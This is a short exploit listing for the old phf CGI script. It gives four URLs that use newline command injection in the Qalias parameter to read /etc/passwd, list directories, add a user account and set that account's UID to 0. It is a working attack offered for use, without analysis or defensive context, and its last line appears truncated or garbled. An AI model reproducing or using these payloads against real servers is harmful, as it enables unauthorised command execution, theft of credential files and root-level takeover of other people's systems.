Exploit:

 ->View passwd file
  http://host.com/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd

 ->List directory
  http://host.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/

 ->Add a user account
  http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi%20dagashi%20100%20

 ->Change UID to 0 on your account
  http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0